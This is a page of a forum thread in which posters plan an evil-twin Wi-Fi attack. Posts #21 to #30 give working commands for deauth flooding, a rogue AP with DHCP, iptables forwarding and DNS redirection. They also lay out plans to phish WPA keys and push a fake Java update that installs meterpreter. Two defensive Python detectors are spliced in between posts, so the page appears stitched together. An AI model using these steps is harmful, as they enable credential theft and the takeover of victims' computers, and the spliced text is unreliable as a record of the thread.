Page 3 of 6
Results 21 to 30 of 56

Thread: Bruteforce attack useless

  1. #21 | Good friend of the forums | Join Date: Jun 2008 | Posts: 425

    OK, this thread is exactly what I am trying to do myself. I just have a few problems that I need to solve.

    What I have working: evil AP, Aireplay is doing a massive DDoS to the victim's AP, all clients are not associated and are probing the ESSID.

    OK, so the basics are done.

    Now I need to get the DHCP server up and running to assign IP addresses to the clients.

    I downloaded dhcp-3.0.7 from the ISC site, but I am having problems installing it. Not sure if it's compatible with BackTrack 3. Any ideas here? This is the error it is piping to me:
    Code:


    create a file named /etc/dhcpd.conf and put this in it

    option subnet-mask 255.255.255.0;
    option routers 10.8.253.254;
    filename "pxeboot";

    ddns-update-style none;

    option domain-name "google.com";
    option broadcast-address 10.8.253.255;
    option domain-name-servers 10.8.0.7;
    server-name "DHCPserver";
    server-identifier 10.8.253.201;

    default-lease-time 7200;
    max-lease-time 7200;

    subnet 10.8.253.0 netmask 255.255.255.0 {
    next-server 10.8.253.201;
    range 10.8.253.29 10.8.253.200;
    }

    and run "dhcpd ath0"; this will serve IP addresses to anyone that connects.
    Hope it helps. Commands are on BT3.
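From the defender's side, the deauthentication flood described above is the loudest part of the whole setup and is easy to pick out of a monitor-mode capture. The following is an added example, not code from this thread: it parses constructed 802.11 management frames and flags a BSSID when more deauthentication frames than a threshold arrive inside a one-second window. The frame layout assumes no radiotap header, and the BSSID and frames are constructed sample data.

```python
import struct
from collections import defaultdict, deque

BROADCAST = b'\xff' * 6
DEAUTH_SUBTYPE = 12   # 802.11 management subtype for Deauthentication

def build_mgmt_frame(subtype, addr1, addr2, bssid, seq, body=b''):
    """Build a bare 802.11 management frame (constructed sample, no radiotap header).
    Frame Control byte 0 = subtype << 4 | type, with type 0 = management."""
    fc = subtype << 4
    return struct.pack('<HH6s6s6sH', fc, 0, addr1, addr2, bssid, seq << 4) + body

def is_deauth(frame):
    fc = frame[0]
    return len(frame) >= 26 and (fc & 0x0C) == 0 and (fc >> 4) == DEAUTH_SUBTYPE

def parse_deauth(frame):
    # Returns (receiver, transmitter, bssid, reason_code) of a deauth frame
    addr1, addr2, bssid = frame[4:10], frame[10:16], frame[16:22]
    reason, = struct.unpack_from('<H', frame, 24)
    return addr1, addr2, bssid, reason

def detect_deauth_flood(frames, threshold=10, window=1.0):
    """frames: iterable of (timestamp_seconds, raw_frame) in capture order.
    A BSSID is flagged when more than `threshold` deauths fall inside any
    `window` seconds. Returns {bssid: (peak_in_window, broadcast_deauths, reason_codes)}."""
    recent = defaultdict(deque)   # bssid -> timestamps of deauths still inside the window
    stats = {}
    for ts, frame in frames:
        if not is_deauth(frame):
            continue
        addr1, _, bssid, reason = parse_deauth(frame)
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        peak, bcast, reasons = stats.get(bssid, (0, 0, frozenset()))
        stats[bssid] = (max(peak, len(q)), bcast + (addr1 == BROADCAST), reasons | {reason})
    return {b: s for b, s in stats.items() if s[0] > threshold}

SAMPLE_AP = bytes.fromhex('001122334455')  # constructed BSSID of the genuine AP

def sample_capture(n_deauth=30):
    """Constructed capture: n broadcast deauths spoofed from the AP, 10 ms apart,
    with reason code 7 (class 3 frame from a non-associated STA), plus three beacons."""
    cap = [(i * 0.01, build_mgmt_frame(DEAUTH_SUBTYPE, BROADCAST, SAMPLE_AP, SAMPLE_AP,
                                        i, struct.pack('<H', 7))) for i in range(n_deauth)]
    cap += [(i * 0.1, build_mgmt_frame(8, BROADCAST, SAMPLE_AP, SAMPLE_AP, 100 + i))
            for i in range(3)]
    return cap
```

Running `detect_deauth_flood(sample_capture())` flags SAMPLE_AP with a peak of 30 frames in the window, all addressed to broadcast; a handful of deauths per second from a real AP stays below the threshold.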

  2. #22 | Good friend of the forums | Join Date: Jun 2008 | Posts: 425

    I'm trying to make it so that after they connect to your AP and you get the WPA passphrase, you then cancel the connection and mimic the real AP with WPA, and then forward the clients' traffic to the real AP.
    I have tried this:
    ifconfig rausb0 0.0.0.0
    ifconfig eth0 0.0.0.0

    brctl addbr br0
    brctl addif br0 rausb0
    brctl addif br0 eth0 (just testing at the moment)

    ifconfig br0 up
    route add default gw 192.168.1.1
    iptables -A FORWARD -i rausb0 -o eth0 -j ACCEPT
    iptables -t nat -j POSTROUTING -A MASQUERADE

    on my softAP and can still surf the net, and on the target client I can sometimes ping Google, but the computer doesn't display the web page.
    I am using ad-hoc between target client and softAP; no encryption is used.

    Why isn't the target client able to browse the internet, and if it's DNS (ping goes through), why does ping work but DNS doesn't?

    Thanks

  3. #23 | Member imported_Deathray | Join Date: Oct 2007 | Posts: 381

    What a brilliant way of approach. You guys are pretty impressive. Truly out-of-the-box thinking :b.
    If one could combine evilgrade Java update with a WPA stealing payload, a phishing website which all DNS lookups point to on the rogue AP
    which asks for the WPA key, and at the same time spamming deauthentication packets to the genuine AP, the WPA key will be easily attained
    in a matter of time. I wish I could help but programming (C) is still very new to me.

    Compaq I like your thoughts on forwarding the traffic, but I think a better approach would be to create a method on which the rogue-ap performs
    an ifconfig wlan0 DOWN once the key is attained and verified on the real AP. Because I doubt the forwarding will be stable enough.

    But before evilgrade can be implemented in the attack, the Java part of it has to be fixed. ShadowKill was going to take a look at it but I don't think he has
    accomplished anything yet. Try taking a look at this thread: http://forums.remote-exploit.org/showthread.php?t=17752.
    - Poul Wittig

  4. #24 | Member | Join Date: Feb 2010 | Posts: 204

    This is what I plan to do:

    Create my evil AP, set up a DHCP server and allow the victim to happily surf the net <--- easily done with airbase-ng, dnsmasq

    I then let the user happily surf the internet whilst I prepare my payload <--------- this is working too

    I create a meterpreter.exe and set up the listening side <------------- easily done

    I then use this exe with evilgrade and get that up and ready <---------- this is easy too

    From there I create my fake splash screen, and then edit dnsmasq to forward all traffic to my apache server. The apache server says "Java outdated, please update by going to control panel, java" etc. etc., with screenshots <---------- easy

    This makes the victim feel more secure, goes to upgrade, evilgrade kicks in, meterpreter is executed <------- a bit of dnsmasq editing to forward javaupdate to evilgrade.

    And then you restart dnsmasq to allow traffic once again.

    Victim can now happily surf the net whilst you do your business.

  5. #25 | Member | Join Date: Feb 2010 | Posts: 204

    Quote Originally Posted by compaq:
    I'm trying to make it so that after they connect to your AP and you get the WPA passphrase, you then cancel the connection and mimic the real AP with WPA, and then forward the clients' traffic to the real AP.
    I have tried this:
    ifconfig rausb0 0.0.0.0
    ifconfig eth0 0.0.0.0

    brctl addbr br0
    brctl addif br0 rausb0
    brctl addif br0 eth0 (just testing at the moment)

    ifconfig br0 up
    route add default gw 192.168.1.1
    iptables -A FORWARD -i rausb0 -o eth0 -j ACCEPT
    iptables -t nat -j POSTROUTING -A MASQUERADE

    on my softAP and can still surf the net, and on the target client I can sometimes ping Google, but the computer doesn't display the web page.
    I am using ad-hoc between target client and softAP; no encryption is used.

    Why isn't the target client able to browse the internet, and if it's DNS (ping goes through), why does ping work but DNS doesn't?

    Thanks
    This is what I did a while ago.

    Change as you please; this forwards traffic to the internet through your PC.
    Replace wlan0 with eth0 if you have a hard-wired net connection. This is something I have done in BackTrack; since then I moved onto the new Kubuntu 8.1, in which I will be using dnsmasq. The principles are the same.

    You also need to edit dhcpd leases first though.

    ifconfig wlan1 down
    rmmod ndiswrapper
    modprobe r8187
    modprobe tun
    ifconfig wlan1 up
    airmon-ng start wlan1
    airbase-ng -P -C 30 -e "Wifi100" -v wlan1

    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    cd /
    cd etc
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo > dhcpd.leases
    killall dhcpd
    dhcpd -cf dhcpd.conf -lf dhcpd.leases at0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
    dhcpd.conf file at /etc looks like:
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 10.0.0.255;
    option routers 10.0.0.1;
    option domain-name-servers 10.0.0.1;
    range 10.0.0.20 10.0.0.50;
    }

    Hope this fixes it for you.

  6. #26 | Member | Join Date: Feb 2010 | Posts: 204

    OK then, how about this:

    The redirected webpage contains both instructions to upgrade Java and the SMB relay exploit; whichever we get first is great. I was thinking along the karmetasploit route of multiple exploits, but that would be too noticeable with the page clicks.

    I intend to have this up and running by next week, providing no major problems.
    Once we sort the manual steps out we can then automate the whole thing at a later stage.

  7. #27 | Member | Join Date: Feb 2010 | Posts: 204

    Some more updates. I don't think we need to use evilgrade.

    Let's look at a normal upgrade for Java.

    (1) Requesting an update from the control panel in Java links to this site:
    http://javadl-esd.sun.com/update/1.6.0/map-1.6.0.xml

    Can someone with an older version of Java use Wireshark and let us know where it looks for the update XML? 1.5? 1.4? etc.

    We replace any requests going to this page with our own update .xml file.

    (2) If an upgrade is present it then goes to this URL:
    http://javadl-esd.sun.com/update/1.6.0/1.6.0_07-b06.xml

    http://javadl.sun.com/webapps/download/GetFile/1.6.0_07-b06/windows-i586/jre-6u7-windows-i586-p-iftw.exe

    We replace that exe with our package.

    Does this make sense?

    That's all there is to it, I think; it's the XML files that need modifying.

    Either we download all the files in the /update directory at Sun Java,

    or we somehow spoof java.sun.com/update/whatever to one of our own XML files, regardless of the version/directory, so there will always be a fake update regardless of version number.
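What makes both the DNAT of port 53 in #25 and the update-server spoofing above work is that the client's resolver answers for a public hostname such as javadl-esd.sun.com with the rogue AP's own 10.x address. That is visible on the client side. The following is an added example, not code from this thread: a small DNS response parser that flags A records mapping a name to non-global address space. The response packet, hostname and addresses are constructed sample values.

```python
import ipaddress
import struct

def read_name(msg, off):
    """Decode a DNS name at offset `off`, following compression pointers.
    Returns (dotted name, offset just past the name in the original stream)."""
    labels, end, jumped = [], None, False
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack_from('>H', msg, off)[0] & 0x3FFF, True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode('ascii'))
        off += ln
    return '.'.join(labels), end if jumped else off

def parse_a_answers(msg):
    """Return [(name, ipv4)] for every A record in the answer section."""
    qdcount, ancount = struct.unpack_from('>HH', msg, 4)
    off, out = 12, []
    for _ in range(qdcount):
        _, off = read_name(msg, off)
        off += 4                                    # QTYPE + QCLASS
    for _ in range(ancount):
        name, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack_from('>HHIH', msg, off)
        off += 10                                   # TYPE, CLASS, TTL, RDLENGTH
        if rtype == 1 and rdlen == 4:
            out.append((name, str(ipaddress.IPv4Address(msg[off:off + 4]))))
        off += rdlen
    return out

def suspicious_answers(msg):
    """A records that map a name to non-global space (10/8, 192.168/16, loopback, ...):
    what a client sees when port 53 is DNATed to a rogue AP answering with its own address."""
    return [(n, ip) for n, ip in parse_a_answers(msg) if not ipaddress.ip_address(ip).is_global]

def build_response(name, ip, txid=0x1234):
    """Constructed sample response: one question, one A answer using a pointer to it."""
    qname = b''.join(bytes([len(l)]) + l.encode() for l in name.split('.')) + b'\x00'
    header = struct.pack('>HHHHHH', txid, 0x8180, 1, 1, 0, 0)
    answer = struct.pack('>HHHIH', 0xC00C, 1, 1, 60, 4) + ipaddress.IPv4Address(ip).packed
    return header + qname + struct.pack('>HH', 1, 1) + answer
```

`suspicious_answers(build_response('javadl-esd.sun.com', '10.0.0.1'))` returns the hijacked record, while the same name answered with a public address returns an empty list.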

  8. #28 | Member | Join Date: Sep 2008 | Posts: 146

    Wow guys, this is an awesome thread! I've been trying to accomplish this very same thing for a while now.
    Create a transparent evilgrade+karmetasploit AP that spoofs the original AP, hit the real AP with a DoS attack and force a reconnect to your fake AP. Once they are surfing over your connection you have so many options for getting a shell it would seem impossible not to be able to get one, even on a fully updated box.

    I have integrated karmetasploit with DNS spoofing and evilgrade already, but getting the DHCP service running correctly was my only obstacle. Now that some posters have graciously explained how to do this I am hoping to be able to get everything working as planned. I will try this as soon as possible and report back to let you know how it's going!

    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"

  9. #29 | Member | Join Date: Feb 2010 | Posts: 204

    Yes, there are so many avenues we can follow once they are surfing through us.

    I would just have the redirect in place until the user updates Java... others may want to try exploits which, IMO, are quickly patched by many users.

    As with all pentesting, we discuss ways to prevent such exploitation.

  10. #30 | Member | Join Date: Feb 2010 | Posts: 204

    How about this:

    We redirect all traffic via iptables to a Squid proxy and also Squirm, which then gives us greater flexibility in the future.

    We can then use modules provided by evilgrade, do a bit of editing, and that solves our version problem with Java.

    So initially we set up iptables to forward all traffic to the internet; once the exploit is ready, we then redirect to Squid until some exploit takes, and then iptables again back to the legit internet.

    Or other options include any exes with our payload.
